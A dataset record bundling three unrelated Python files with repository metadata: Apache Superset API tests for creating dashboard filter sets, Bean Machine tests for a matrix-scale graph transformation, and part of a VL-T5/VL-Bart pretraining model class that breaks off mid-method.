| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
cbdaef9b95a01d7b35fd7eef2bf2357e1babede8
| 20,390
|
py
|
Python
|
tests/integration_tests/dashboards/filter_sets/create_api_tests.py
|
m-ajay/superset
|
2cd80543581155225f2b538ad8cd5ebc7de5a9ff
|
[
"Apache-2.0"
] | 18,621
|
2017-06-19T09:57:44.000Z
|
2021-01-05T06:28:21.000Z
|
tests/integration_tests/dashboards/filter_sets/create_api_tests.py
|
m-ajay/superset
|
2cd80543581155225f2b538ad8cd5ebc7de5a9ff
|
[
"Apache-2.0"
] | 9,043
|
2017-07-05T16:10:48.000Z
|
2021-01-05T17:58:01.000Z
|
tests/integration_tests/dashboards/filter_sets/create_api_tests.py
|
m-ajay/superset
|
2cd80543581155225f2b538ad8cd5ebc7de5a9ff
|
[
"Apache-2.0"
] | 5,527
|
2017-07-06T01:39:43.000Z
|
2021-01-05T06:01:11.000Z
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import annotations
from typing import Any, Dict, TYPE_CHECKING
from superset.dashboards.filter_sets.consts import (
DASHBOARD_OWNER_TYPE,
DESCRIPTION_FIELD,
JSON_METADATA_FIELD,
NAME_FIELD,
OWNER_ID_FIELD,
OWNER_TYPE_FIELD,
USER_OWNER_TYPE,
)
from tests.integration_tests.base_tests import login
from tests.integration_tests.dashboards.filter_sets.consts import (
ADMIN_USERNAME_FOR_TEST,
DASHBOARD_OWNER_USERNAME,
FILTER_SET_OWNER_USERNAME,
)
from tests.integration_tests.dashboards.filter_sets.utils import (
call_create_filter_set,
get_filter_set_by_dashboard_id,
get_filter_set_by_name,
)
if TYPE_CHECKING:
from flask.testing import FlaskClient
def assert_filterset_was_not_created(filter_set_data: Dict[str, Any]) -> None:
assert get_filter_set_by_name(str(filter_set_data["name"])) is None
def assert_filterset_was_created(filter_set_data: Dict[str, Any]) -> None:
assert get_filter_set_by_name(filter_set_data["name"]) is not None
class TestCreateFilterSetsApi:
def test_with_extra_field__400(
self,
dashboard_id: int,
valid_filter_set_data_for_create: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_create["extra"] = "val"
# act
response = call_create_filter_set(
client, dashboard_id, valid_filter_set_data_for_create
)
# assert
assert response.status_code == 400
assert response.json["message"]["extra"][0] == "Unknown field."
assert_filterset_was_not_created(valid_filter_set_data_for_create)
def test_with_id_field__400(
self,
dashboard_id: int,
valid_filter_set_data_for_create: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_create["id"] = 1
# act
response = call_create_filter_set(
client, dashboard_id, valid_filter_set_data_for_create
)
# assert
assert response.status_code == 400
assert response.json["message"]["id"][0] == "Unknown field."
assert_filterset_was_not_created(valid_filter_set_data_for_create)
def test_with_dashboard_not_exists__404(
self,
not_exists_dashboard: int,
valid_filter_set_data_for_create: Dict[str, Any],
client: FlaskClient[Any],
):
# act
login(client, "admin")
response = call_create_filter_set(
client, not_exists_dashboard, valid_filter_set_data_for_create
)
# assert
assert response.status_code == 404
assert_filterset_was_not_created(valid_filter_set_data_for_create)
def test_without_name__400(
self,
dashboard_id: int,
valid_filter_set_data_for_create: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_create.pop(NAME_FIELD, None)
# act
response = call_create_filter_set(
client, dashboard_id, valid_filter_set_data_for_create
)
# assert
assert response.status_code == 400
assert get_filter_set_by_dashboard_id(dashboard_id) == []
def test_with_none_name__400(
self,
dashboard_id: int,
valid_filter_set_data_for_create: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_create[NAME_FIELD] = None
# act
response = call_create_filter_set(
client, dashboard_id, valid_filter_set_data_for_create
)
# assert
assert response.status_code == 400
assert_filterset_was_not_created(valid_filter_set_data_for_create)
def test_with_int_as_name__400(
self,
dashboard_id: int,
valid_filter_set_data_for_create: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_create[NAME_FIELD] = 4
# act
response = call_create_filter_set(
client, dashboard_id, valid_filter_set_data_for_create
)
# assert
assert response.status_code == 400
assert_filterset_was_not_created(valid_filter_set_data_for_create)
def test_without_description__201(
self,
dashboard_id: int,
valid_filter_set_data_for_create: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_create.pop(DESCRIPTION_FIELD, None)
# act
response = call_create_filter_set(
client, dashboard_id, valid_filter_set_data_for_create
)
# assert
assert response.status_code == 201
assert_filterset_was_created(valid_filter_set_data_for_create)
def test_with_none_description__201(
self,
dashboard_id: int,
valid_filter_set_data_for_create: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_create[DESCRIPTION_FIELD] = None
# act
response = call_create_filter_set(
client, dashboard_id, valid_filter_set_data_for_create
)
# assert
assert response.status_code == 201
assert_filterset_was_created(valid_filter_set_data_for_create)
def test_with_int_as_description__400(
self,
dashboard_id: int,
valid_filter_set_data_for_create: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_create[DESCRIPTION_FIELD] = 1
# act
response = call_create_filter_set(
client, dashboard_id, valid_filter_set_data_for_create
)
# assert
assert response.status_code == 400
assert_filterset_was_not_created(valid_filter_set_data_for_create)
def test_without_json_metadata__400(
self,
dashboard_id: int,
valid_filter_set_data_for_create: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_create.pop(JSON_METADATA_FIELD, None)
# act
response = call_create_filter_set(
client, dashboard_id, valid_filter_set_data_for_create
)
# assert
assert response.status_code == 400
assert_filterset_was_not_created(valid_filter_set_data_for_create)
def test_with_invalid_json_metadata__400(
self,
dashboard_id: int,
valid_filter_set_data_for_create: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_create[DESCRIPTION_FIELD] = {}
# act
response = call_create_filter_set(
client, dashboard_id, valid_filter_set_data_for_create
)
# assert
assert response.status_code == 400
assert_filterset_was_not_created(valid_filter_set_data_for_create)
def test_without_owner_type__400(
self,
dashboard_id: int,
valid_filter_set_data_for_create: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_create.pop(OWNER_TYPE_FIELD, None)
# act
response = call_create_filter_set(
client, dashboard_id, valid_filter_set_data_for_create
)
# assert
assert response.status_code == 400
assert_filterset_was_not_created(valid_filter_set_data_for_create)
def test_with_invalid_owner_type__400(
self,
dashboard_id: int,
valid_filter_set_data_for_create: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_create[OWNER_TYPE_FIELD] = "OTHER_TYPE"
# act
response = call_create_filter_set(
client, dashboard_id, valid_filter_set_data_for_create
)
# assert
assert response.status_code == 400
assert_filterset_was_not_created(valid_filter_set_data_for_create)
def test_without_owner_id_when_owner_type_is_user__400(
self,
dashboard_id: int,
valid_filter_set_data_for_create: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_create[OWNER_TYPE_FIELD] = USER_OWNER_TYPE
valid_filter_set_data_for_create.pop(OWNER_ID_FIELD, None)
# act
response = call_create_filter_set(
client, dashboard_id, valid_filter_set_data_for_create
)
# assert
assert response.status_code == 400
assert_filterset_was_not_created(valid_filter_set_data_for_create)
def test_without_owner_id_when_owner_type_is_dashboard__201(
self,
dashboard_id: int,
valid_filter_set_data_for_create: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_create[OWNER_TYPE_FIELD] = DASHBOARD_OWNER_TYPE
valid_filter_set_data_for_create.pop(OWNER_ID_FIELD, None)
# act
response = call_create_filter_set(
client, dashboard_id, valid_filter_set_data_for_create
)
# assert
assert response.status_code == 201
assert_filterset_was_created(valid_filter_set_data_for_create)
def test_with_not_exists_owner__400(
self,
dashboard_id: int,
valid_filter_set_data_for_create: Dict[str, Any],
not_exists_user_id: int,
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_create[OWNER_TYPE_FIELD] = USER_OWNER_TYPE
valid_filter_set_data_for_create[OWNER_ID_FIELD] = not_exists_user_id
# act
response = call_create_filter_set(
client, dashboard_id, valid_filter_set_data_for_create
)
# assert
assert response.status_code == 400
assert_filterset_was_not_created(valid_filter_set_data_for_create)
def test_when_caller_is_admin_and_owner_is_admin__201(
self,
dashboard_id: int,
test_users: Dict[str, int],
valid_filter_set_data_for_create: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_create[OWNER_TYPE_FIELD] = USER_OWNER_TYPE
valid_filter_set_data_for_create[OWNER_ID_FIELD] = test_users[
ADMIN_USERNAME_FOR_TEST
]
# act
response = call_create_filter_set(
client, dashboard_id, valid_filter_set_data_for_create
)
# assert
assert response.status_code == 201
assert_filterset_was_created(valid_filter_set_data_for_create)
def test_when_caller_is_admin_and_owner_is_dashboard_owner__201(
self,
dashboard_id: int,
test_users: Dict[str, int],
valid_filter_set_data_for_create: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_create[OWNER_TYPE_FIELD] = USER_OWNER_TYPE
valid_filter_set_data_for_create[OWNER_ID_FIELD] = test_users[
DASHBOARD_OWNER_USERNAME
]
# act
response = call_create_filter_set(
client, dashboard_id, valid_filter_set_data_for_create
)
# assert
assert response.status_code == 201
assert_filterset_was_created(valid_filter_set_data_for_create)
def test_when_caller_is_admin_and_owner_is_regular_user__201(
self,
dashboard_id: int,
test_users: Dict[str, int],
valid_filter_set_data_for_create: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_create[OWNER_TYPE_FIELD] = USER_OWNER_TYPE
valid_filter_set_data_for_create[OWNER_ID_FIELD] = test_users[
FILTER_SET_OWNER_USERNAME
]
# act
response = call_create_filter_set(
client, dashboard_id, valid_filter_set_data_for_create
)
# assert
assert response.status_code == 201
assert_filterset_was_created(valid_filter_set_data_for_create)
def test_when_caller_is_admin_and_owner_type_is_dashboard__201(
self,
dashboard_id: int,
test_users: Dict[str, int],
valid_filter_set_data_for_create: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, "admin")
valid_filter_set_data_for_create[OWNER_TYPE_FIELD] = DASHBOARD_OWNER_TYPE
valid_filter_set_data_for_create[OWNER_ID_FIELD] = dashboard_id
# act
response = call_create_filter_set(
client, dashboard_id, valid_filter_set_data_for_create
)
# assert
assert response.status_code == 201
assert_filterset_was_created(valid_filter_set_data_for_create)
def test_when_caller_is_dashboard_owner_and_owner_is_admin__201(
self,
dashboard_id: int,
test_users: Dict[str, int],
valid_filter_set_data_for_create: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, DASHBOARD_OWNER_USERNAME)
valid_filter_set_data_for_create[OWNER_TYPE_FIELD] = USER_OWNER_TYPE
valid_filter_set_data_for_create[OWNER_ID_FIELD] = test_users[
ADMIN_USERNAME_FOR_TEST
]
# act
response = call_create_filter_set(
client, dashboard_id, valid_filter_set_data_for_create
)
# assert
assert response.status_code == 201
assert_filterset_was_created(valid_filter_set_data_for_create)
def test_when_caller_is_dashboard_owner_and_owner_is_dashboard_owner__201(
self,
dashboard_id: int,
test_users: Dict[str, int],
valid_filter_set_data_for_create: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, DASHBOARD_OWNER_USERNAME)
valid_filter_set_data_for_create[OWNER_TYPE_FIELD] = USER_OWNER_TYPE
valid_filter_set_data_for_create[OWNER_ID_FIELD] = test_users[
DASHBOARD_OWNER_USERNAME
]
# act
response = call_create_filter_set(
client, dashboard_id, valid_filter_set_data_for_create
)
# assert
assert response.status_code == 201
assert_filterset_was_created(valid_filter_set_data_for_create)
def test_when_caller_is_dashboard_owner_and_owner_is_regular_user__201(
self,
dashboard_id: int,
test_users: Dict[str, int],
valid_filter_set_data_for_create: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, DASHBOARD_OWNER_USERNAME)
valid_filter_set_data_for_create[OWNER_TYPE_FIELD] = USER_OWNER_TYPE
valid_filter_set_data_for_create[OWNER_ID_FIELD] = test_users[
FILTER_SET_OWNER_USERNAME
]
# act
response = call_create_filter_set(
client, dashboard_id, valid_filter_set_data_for_create
)
# assert
assert response.status_code == 201
assert_filterset_was_created(valid_filter_set_data_for_create)
def test_when_caller_is_dashboard_owner_and_owner_type_is_dashboard__201(
self,
dashboard_id: int,
test_users: Dict[str, int],
valid_filter_set_data_for_create: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, DASHBOARD_OWNER_USERNAME)
valid_filter_set_data_for_create[OWNER_TYPE_FIELD] = DASHBOARD_OWNER_TYPE
valid_filter_set_data_for_create[OWNER_ID_FIELD] = dashboard_id
# act
response = call_create_filter_set(
client, dashboard_id, valid_filter_set_data_for_create
)
# assert
assert response.status_code == 201
assert_filterset_was_created(valid_filter_set_data_for_create)
def test_when_caller_is_regular_user_and_owner_is_admin__201(
self,
dashboard_id: int,
test_users: Dict[str, int],
valid_filter_set_data_for_create: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, FILTER_SET_OWNER_USERNAME)
valid_filter_set_data_for_create[OWNER_TYPE_FIELD] = USER_OWNER_TYPE
valid_filter_set_data_for_create[OWNER_ID_FIELD] = test_users[
ADMIN_USERNAME_FOR_TEST
]
# act
response = call_create_filter_set(
client, dashboard_id, valid_filter_set_data_for_create
)
# assert
assert response.status_code == 201
assert_filterset_was_created(valid_filter_set_data_for_create)
def test_when_caller_is_regular_user_and_owner_is_dashboard_owner__201(
self,
dashboard_id: int,
test_users: Dict[str, int],
valid_filter_set_data_for_create: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, FILTER_SET_OWNER_USERNAME)
valid_filter_set_data_for_create[OWNER_TYPE_FIELD] = USER_OWNER_TYPE
valid_filter_set_data_for_create[OWNER_ID_FIELD] = test_users[
DASHBOARD_OWNER_USERNAME
]
# act
response = call_create_filter_set(
client, dashboard_id, valid_filter_set_data_for_create
)
# assert
assert response.status_code == 201
assert_filterset_was_created(valid_filter_set_data_for_create)
def test_when_caller_is_regular_user_and_owner_is_regular_user__201(
self,
dashboard_id: int,
test_users: Dict[str, int],
valid_filter_set_data_for_create: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, FILTER_SET_OWNER_USERNAME)
valid_filter_set_data_for_create[OWNER_TYPE_FIELD] = USER_OWNER_TYPE
valid_filter_set_data_for_create[OWNER_ID_FIELD] = test_users[
FILTER_SET_OWNER_USERNAME
]
# act
response = call_create_filter_set(
client, dashboard_id, valid_filter_set_data_for_create
)
# assert
assert response.status_code == 201
assert_filterset_was_created(valid_filter_set_data_for_create)
def test_when_caller_is_regular_user_and_owner_type_is_dashboard__403(
self,
dashboard_id: int,
test_users: Dict[str, int],
valid_filter_set_data_for_create: Dict[str, Any],
client: FlaskClient[Any],
):
# arrange
login(client, FILTER_SET_OWNER_USERNAME)
valid_filter_set_data_for_create[OWNER_TYPE_FIELD] = DASHBOARD_OWNER_TYPE
valid_filter_set_data_for_create[OWNER_ID_FIELD] = dashboard_id
# act
response = call_create_filter_set(
client, dashboard_id, valid_filter_set_data_for_create
)
# assert
assert response.status_code == 403
assert_filterset_was_not_created(valid_filter_set_data_for_create)
| 32.313788
| 81
| 0.677832
| 2,564
| 20,390
| 4.855304
| 0.057332
| 0.123624
| 0.13471
| 0.180737
| 0.899992
| 0.889067
| 0.880231
| 0.873002
| 0.8726
| 0.871877
| 0
| 0.011723
| 0.25949
| 20,390
| 630
| 82
| 32.365079
| 0.812769
| 0.06258
| 0
| 0.738636
| 0
| 0
| 0.009309
| 0
| 0
| 0
| 0
| 0
| 0.140909
| 1
| 0.068182
| false
| 0
| 0.015909
| 0
| 0.086364
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
1df85b9a41275cb70dc59fecbfd8bddf6b4483b9
| 6,875
|
py
|
Python
|
src/beanmachine/ppl/compiler/tests/fix_matrix_scale_test.py
|
horizon-blue/beanmachine-1
|
b13e4e3e28ffb860947eb8046863b0cabb581222
|
[
"MIT"
] | 177
|
2021-12-12T14:19:05.000Z
|
2022-03-24T05:48:10.000Z
|
src/beanmachine/ppl/compiler/tests/fix_matrix_scale_test.py
|
horizon-blue/beanmachine-1
|
b13e4e3e28ffb860947eb8046863b0cabb581222
|
[
"MIT"
] | 171
|
2021-12-11T06:12:05.000Z
|
2022-03-31T20:26:29.000Z
|
src/beanmachine/ppl/compiler/tests/fix_matrix_scale_test.py
|
horizon-blue/beanmachine-1
|
b13e4e3e28ffb860947eb8046863b0cabb581222
|
[
"MIT"
] | 31
|
2021-12-11T06:27:19.000Z
|
2022-03-25T13:31:56.000Z
|
# Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import unittest
import beanmachine.ppl as bm
import torch
from beanmachine.ppl.inference import BMGInference
from torch.distributions import Normal
@bm.random_variable
def scalar():
return Normal(0.0, 1.0)
matrix = torch.tensor([20, 40])
@bm.functional
def scaled():
return scalar() * matrix
@bm.functional
def scaled_sym():
return matrix * scalar()
@bm.functional
def scaled2():
return scalar() * torch.tensor([scalar(), scalar()])
@bm.functional
def scaled2_sym():
return (torch.tensor([scalar(), scalar()])) * scalar()
class FixMatrixScaleTest(unittest.TestCase):
def test_fix_matrix_scale_1(self) -> None:
self.maxDiff = None
observations = {}
queries = [scaled()]
num_samples = 1000
num_chains = 1
# Sanity check to make sure the model is valid
nmc = bm.SingleSiteNewtonianMonteCarlo()
_ = nmc.infer(
queries=queries,
observations=observations,
num_samples=num_samples,
num_chains=num_chains,
)
observed = BMGInference().to_dot(queries, observations, after_transform=False)
# The model before optimization
expected = """
digraph "graph" {
N0[label=0.0];
N1[label=1.0];
N2[label=Normal];
N3[label=Sample];
N4[label="[20,40]"];
N5[label="*"];
N6[label=Query];
N0 -> N2;
N1 -> N2;
N2 -> N3;
N3 -> N5;
N4 -> N5;
N5 -> N6;
}
"""
self.assertEqual(expected.strip(), observed.strip())
# After optimization:
observed = BMGInference().to_dot(queries, observations, after_transform=True)
expected = """
digraph "graph" {
N0[label=0.0];
N1[label=1.0];
N2[label=Normal];
N3[label=Sample];
N4[label="[20,40]"];
N5[label=MatrixScale];
N6[label=Query];
N0 -> N2;
N1 -> N2;
N2 -> N3;
N3 -> N5;
N4 -> N5;
N5 -> N6;
}"""
self.assertEqual(expected.strip(), observed.strip())
# The model runs on Bean Machine Graph
_ = BMGInference().infer(queries, observations, num_samples=num_samples)
def test_fix_matrix_scale_1_sym(self) -> None:
self.maxDiff = None
observations = {}
queries = [scaled_sym()]
num_samples = 1000
num_chains = 1
# Sanity check to make sure the model is valid
nmc = bm.SingleSiteNewtonianMonteCarlo()
_ = nmc.infer(
queries=queries,
observations=observations,
num_samples=num_samples,
num_chains=num_chains,
)
observed = BMGInference().to_dot(queries, observations, after_transform=False)
# The model before optimization
expected = """
digraph "graph" {
N0[label="[20,40]"];
N1[label=0.0];
N2[label=1.0];
N3[label=Normal];
N4[label=Sample];
N5[label="*"];
N6[label=Query];
N0 -> N5;
N1 -> N3;
N2 -> N3;
N3 -> N4;
N4 -> N5;
N5 -> N6;
}
"""
self.assertEqual(expected.strip(), observed.strip())
# After optimization:
observed = BMGInference().to_dot(queries, observations, after_transform=True)
expected = """
digraph "graph" {
N0[label=0.0];
N1[label=1.0];
N2[label=Normal];
N3[label=Sample];
N4[label="[20,40]"];
N5[label=MatrixScale];
N6[label=Query];
N0 -> N2;
N1 -> N2;
N2 -> N3;
N3 -> N5;
N4 -> N5;
N5 -> N6;
}"""
self.assertEqual(expected.strip(), observed.strip())
# The model runs on Bean Machine Graph
_ = BMGInference().infer(queries, observations, num_samples=num_samples)
def test_fix_matrix_scale_2(self) -> None:
self.maxDiff = None
observations = {}
queries = [scaled2()]
num_samples = 1000
num_chains = 1
# Sanity check to make sure the model is valid
nmc = bm.SingleSiteNewtonianMonteCarlo()
_ = nmc.infer(
queries=queries,
observations=observations,
num_samples=num_samples,
num_chains=num_chains,
)
observed = BMGInference().to_dot(queries, observations, after_transform=False)
# The model before optimization
expected = """
digraph "graph" {
N0[label=0.0];
N1[label=1.0];
N2[label=Normal];
N3[label=Sample];
N4[label=Tensor];
N5[label="*"];
N6[label=Query];
N0 -> N2;
N1 -> N2;
N2 -> N3;
N3 -> N4;
N3 -> N4;
N3 -> N5;
N4 -> N5;
N5 -> N6;
}
"""
self.assertEqual(expected.strip(), observed.strip())
# After optimization:
observed = BMGInference().to_dot(queries, observations, after_transform=True)
expected = """
digraph "graph" {
N0[label=0.0];
N1[label=1.0];
N2[label=Normal];
N3[label=Sample];
N4[label=2];
N5[label=1];
N6[label=ToMatrix];
N7[label=MatrixScale];
N8[label=Query];
N0 -> N2;
N1 -> N2;
N2 -> N3;
N3 -> N6;
N3 -> N6;
N3 -> N7;
N4 -> N6;
N5 -> N6;
N6 -> N7;
N7 -> N8;
}
"""
self.assertEqual(expected.strip(), observed.strip())
# The model runs on Bean Machine Graph
_ = BMGInference().infer(queries, observations, num_samples=num_samples)
def test_fix_matrix_scale_2_sym(self) -> None:
self.maxDiff = None
observations = {}
queries = [scaled2_sym()]
num_samples = 1000
num_chains = 1
# Sanity check to make sure the model is valid
nmc = bm.SingleSiteNewtonianMonteCarlo()
_ = nmc.infer(
queries=queries,
observations=observations,
num_samples=num_samples,
num_chains=num_chains,
)
observed = BMGInference().to_dot(queries, observations, after_transform=False)
# The model before optimization
expected = """
digraph "graph" {
N0[label=0.0];
N1[label=1.0];
N2[label=Normal];
N3[label=Sample];
N4[label=Tensor];
N5[label="*"];
N6[label=Query];
N0 -> N2;
N1 -> N2;
N2 -> N3;
N3 -> N4;
N3 -> N4;
N3 -> N5;
N4 -> N5;
N5 -> N6;
}
"""
self.assertEqual(expected.strip(), observed.strip())
# After optimization:
observed = BMGInference().to_dot(queries, observations, after_transform=True)
expected = """
digraph "graph" {
N0[label=0.0];
N1[label=1.0];
N2[label=Normal];
N3[label=Sample];
N4[label=2];
N5[label=1];
N6[label=ToMatrix];
N7[label=MatrixScale];
N8[label=Query];
N0 -> N2;
N1 -> N2;
N2 -> N3;
N3 -> N6;
N3 -> N6;
N3 -> N7;
N4 -> N6;
N5 -> N6;
N6 -> N7;
N7 -> N8;
}
"""
self.assertEqual(expected.strip(), observed.strip())
# The model runs on Bean Machine Graph
_ = BMGInference().infer(queries, observations, num_samples=num_samples)
| 21.894904
| 86
| 0.592291
| 837
| 6,875
| 4.770609
| 0.127838
| 0.050088
| 0.039068
| 0.050088
| 0.857501
| 0.843476
| 0.832457
| 0.832457
| 0.782369
| 0.782369
| 0
| 0.052996
| 0.264436
| 6,875
| 313
| 87
| 21.964856
| 0.736603
| 0.101527
| 0
| 0.82377
| 0
| 0
| 0.330409
| 0.014295
| 0
| 0
| 0
| 0
| 0.032787
| 1
| 0.036885
| false
| 0
| 0.020492
| 0.020492
| 0.081967
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0e16148992c9c3e50c6fd39e90122b58a5e52d3e
| 11,985
|
py
|
Python
|
VL-T5/src/pretrain_model.py
|
ylsung/VL_adapter
|
287409f383f89a11764fc45806864693a4d3e498
|
[
"MIT"
] | 41
|
2021-12-14T02:50:16.000Z
|
2022-03-30T07:41:19.000Z
|
VL-T5/src/pretrain_model.py
|
ylsung/VL_adapter
|
287409f383f89a11764fc45806864693a4d3e498
|
[
"MIT"
] | 1
|
2022-01-07T03:31:47.000Z
|
2022-03-25T00:31:53.000Z
|
VL-T5/src/pretrain_model.py
|
ylsung/VL_adapter
|
287409f383f89a11764fc45806864693a4d3e498
|
[
"MIT"
] | 2
|
2021-12-14T03:10:18.000Z
|
2022-03-29T04:59:23.000Z
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import numpy as np
from modeling_t5 import VLT5
class VLT5Pretraining(VLT5):
def __init__(self, config):
super().__init__(config)
self.losses = self.config.losses.split(',')
def train_step(self, batch):
device = next(self.parameters()).device
batch = self.vis_forward(batch, device)
vis_feats = batch['vis_feats'].to(device)
input_ids = batch['input_ids'].to(device)
vis_pos = batch['boxes'].to(device)
lm_labels = batch["target_ids"].to(device)
loss_weights = batch["loss_weights"].to(device)
output = self(
input_ids=input_ids,
vis_inputs=(vis_feats, vis_pos),
labels=lm_labels,
return_dict=True
)
assert 'loss' in output
lm_mask = lm_labels != -100
lm_mask = lm_mask.float()
B, L = lm_labels.size()
loss = output['loss']
loss = loss.view(B, L) * lm_mask
loss = loss.sum(dim=1) / lm_mask.sum(dim=1).clamp(min=1) # B
task_counts = {task: 0 for task in self.losses}
task_loss = {task: 0 for task in self.losses}
results = {}
results['loss'] = (loss * loss_weights).mean()
results['total_loss'] = loss.detach().sum()
results['total_loss_count'] = len(loss)
task_counts = {task: 0 for task in self.losses}
task_loss = {task: 0 for task in self.losses}
for _loss, task in zip(loss.detach(), batch['task']):
task_loss[task] += _loss
task_counts[task] += 1
for task in self.losses:
if task_counts[task] > 0:
results[f'{task}_loss'] = task_loss[task]
results[f'{task}_loss_count'] = task_counts[task]
return results
@torch.no_grad()
def valid_step(self, batch):
self.eval()
device = next(self.parameters()).device
batch = self.vis_forward(batch, device)
vis_feats = batch['vis_feats'].to(device)
input_ids = batch['input_ids'].to(device)
vis_pos = batch['boxes'].to(device)
lm_labels = batch["target_ids"].to(device)
loss_weights = batch["loss_weights"].to(device)
output = self(
input_ids=input_ids,
vis_inputs=(vis_feats, vis_pos),
labels=lm_labels,
return_dict=True
)
assert 'loss' in output
lm_mask = lm_labels != -100
lm_mask = lm_mask.float()
B, L = lm_labels.size()
loss = output['loss']
loss = loss.view(B, L) * lm_mask
loss = loss.sum(dim=1) / lm_mask.sum(dim=1).clamp(min=1) # B
results = {}
results['loss'] = (loss * loss_weights).mean()
results['total_loss'] = loss.detach().sum()
results['total_loss_count'] = len(loss)
task_counts = {task: 0 for task in self.losses}
task_loss = {task: 0 for task in self.losses}
for _loss, task in zip(loss.detach(), batch['task']):
task_loss[task] += _loss
task_counts[task] += 1
for task in self.losses:
if task_counts[task] > 0:
# result[f'{task}_loss'] = task_loss[task] / task_counts[task]
results[f'{task}_loss'] = task_loss[task]
results[f'{task}_loss_count'] = task_counts[task]
# else:
# result[f'{task}_loss'] = torch.zeros_like(loss)
if 'qa' in self.losses:
output = self.generate(
input_ids=input_ids,
vis_inputs=(vis_feats, vis_pos),
)
generated_sents = self.tokenizer.batch_decode(output, skip_special_tokens=True)
results['qa_pred'] = generated_sents
return results
@torch.no_grad()
def generate_step(self, batch):
self.eval()
device = next(self.parameters()).device
batch = self.vis_forward(batch, device)
vis_feats = batch['vis_feats'].to(device)
input_ids = batch['input_ids'].to(device)
vis_pos = batch['boxes'].to(device)
vis_attention_mask = None
if 'vis_attention_mask' in batch:
vis_attention_mask = batch['vis_attention_mask'].to(device)
output = self.generate(
input_ids=input_ids,
vis_inputs=(vis_feats, vis_pos),
vis_attention_mask=vis_attention_mask,
)
generated_sents = self.tokenizer.batch_decode(output, skip_special_tokens=True)
return generated_sents
from modeling_bart import VLBart
class VLBartPretraining(VLBart):
def __init__(self, config):
super().__init__(config)
self.losses = self.config.losses.split(',')
def train_step(self, batch):
device = next(self.parameters()).device
batch = self.vis_forward(batch, device)
vis_feats = batch['vis_feats'].to(device)
input_ids = batch['input_ids'].to(device)
vis_pos = batch['boxes'].to(device)
lm_labels = batch["target_ids"].to(device)
loss_weights = batch["loss_weights"].to(device)
output = self(
input_ids=input_ids,
vis_inputs=(vis_feats, vis_pos),
labels=lm_labels,
return_dict=True
)
assert 'loss' in output
lm_mask = lm_labels != -100
lm_mask = lm_mask.float()
B, L = lm_labels.size()
loss = output['loss']
loss = loss.view(B, L) * lm_mask
loss = loss.sum(dim=1) / lm_mask.sum(dim=1).clamp(min=1) # B
task_counts = {task: 0 for task in self.losses}
task_loss = {task: 0 for task in self.losses}
results = {}
results['loss'] = (loss * loss_weights).mean()
results['total_loss'] = loss.detach().sum()
results['total_loss_count'] = len(loss)
task_counts = {task: 0 for task in self.losses}
task_loss = {task: 0 for task in self.losses}
for _loss, task in zip(loss.detach(), batch['task']):
task_loss[task] += _loss
task_counts[task] += 1
